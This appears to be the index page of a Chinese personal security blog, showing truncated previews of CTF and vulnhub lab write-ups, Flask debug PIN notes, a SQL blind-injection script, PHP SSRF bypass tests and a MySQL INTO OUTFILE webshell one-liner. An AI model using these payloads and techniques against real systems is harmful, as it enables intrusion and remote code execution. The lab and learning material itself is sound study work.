NEKO

NEKO

superficial aesthetics

python Debug命令执行
12345678md5_list = [ 'root', #当前用户,可通过读取/etc/passwd获取 'flask.app', #一般情况为固定值 'Flask', #一般情况为固定值 '/usr/local/lib/python2.7/dist-packages/flask/app.pyc', #可通过debug错误页面获取 '2485377892354', #mac地址的十进制,通过读取/sys/class/net/eth0/address获取mac...
xman-2018
**12345678910111213141516<?phpinclude 'flag.php';if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>40){ die("Long."); } if(preg_match("/[A-Za-z0-9]+/",$code)){ die("NO."); } @eval($code);}else{ highlight_f...
vulnhub-Bulldog
服务扫描给了ip,直接扫服务12345678910111213nmap -sS -A -O -Pn -T4 192.168.199.12923/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)| 256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)|_ 2...
vulnhub-Lazysysadmin
主机扫描1nmap -sP 10.10.10.0/24 发现靶机ip:10.10.10.188 服务扫描12345678nmap -sS -Pn -T4 10.10.10.18822/tcp open ssh80/tcp open http139/tcp open netbios-ssn445/tcp open microsoft-ds3306/tcp open mysql6667/tcp open irc 445端口有smb服务,6667开启了irc服务,139开启了NBT服务. 扫目录从80入手1python3 dirsearch.py -u 10.10.10...
vulnhub-Freshly
主机扫描1netdiscover -r 10.10.10.0/24 (同一个局域网内) 或者1nmap -sP 10.10.10.0/24 确认主机ip:10.10.10.188 服务扫描1nmap -sS -Pn -T4 10.10.10.188 3个服务:12380/tcp open http443/tcp open https8080/tcp open http-proxy 对端口进行详细探测1nmap -A -O -p80,443,8080 10.10.10.188 12345678910111213PORT STATE SERVICE VERSION8...
vulnhub-FristiLeaks
在公司闲着摸鱼划水,正好看到红日团队做过这系列的教程,于是打算动笔自己也记录一下. 主机扫描1netdiscover -r 10.10.10.0/24 (同一个局域网内) 或者1nmap -sP 10.10.10.0/24 确认主机ip:10.10.10.188 服务扫描1nmap -sS -Pn -T4 10.10.10.188 -sS:SYN扫描 -Pn:不进行Ping操作,将所有指定的主机视作开启的,跳过主机发现的过程 -T4:–T:设置时间模板,分别与数字0-5对应;前两种模式用于IDS躲避,Polite模式降低了扫描 速度以使用更少的带宽和目标主机资源。默认模式为Norm...
sql blind inject summary
抽空把sql盲注的姿势总结下. 以sqli-labs为例. sleep()被禁就用BENCHMARK(10000000,SHA(‘1’)) 含’,’,不含or12345678910111213import requestsurl='http://127.0.0.1/sqli-labs-master/Less-1/index.php'result=''for j in range(1,50): for i in range(33, 125): url1=url+"?id=1' and if(substr((select bina...
知识点随笔记
创建时间:2018-1-25 菜猫进化!->大菜猫(:з」∠) 文件包含当base64被waf时可以使用其他过滤器,比如:1/?file=php://filter/read=string.rot13/resource=flag.php sqli tricksxss和sql注入的最大区别:xss针对客户端的,sql注入是针对服务器的. dic=string.ascii_letters+string.digits+string.punctuation.replace(‘.’,’’) binary可区分大小写:url = "http://120.24.86.145:9004/...
PHP-SSRF绕过tricks
环境:PHP 7.0.12 利用URL保留字符测试代码:1234567891011121314151617<?php$url = $argv[1];if (filter_var($url, FILTER_VALIDATE_URL)) { $r = parse_url($url); print_r($r); echo "---------------------------------------------------\n"; if (preg_match('/baidu\.com$/', $r['host'])) { exec('curl -v -s "' ...
mysql->webshell
参考:http://www.freebuf.com/column/143125.htmlhttp://url.cn/5Oqx2CM 最简单的方法直接1select '<?php @eval($_POST[neko]);?>'INTO OUTFILE 'D:/phpStudy/PHPTutorial/WWW/neko.php'; 不过mysql一般会开启–secure-file-priv选项。查看secure_file_priv:1SHOW VARIABLES LIKE '%secure_file_priv%'; 参数...
n3k0
incisive expression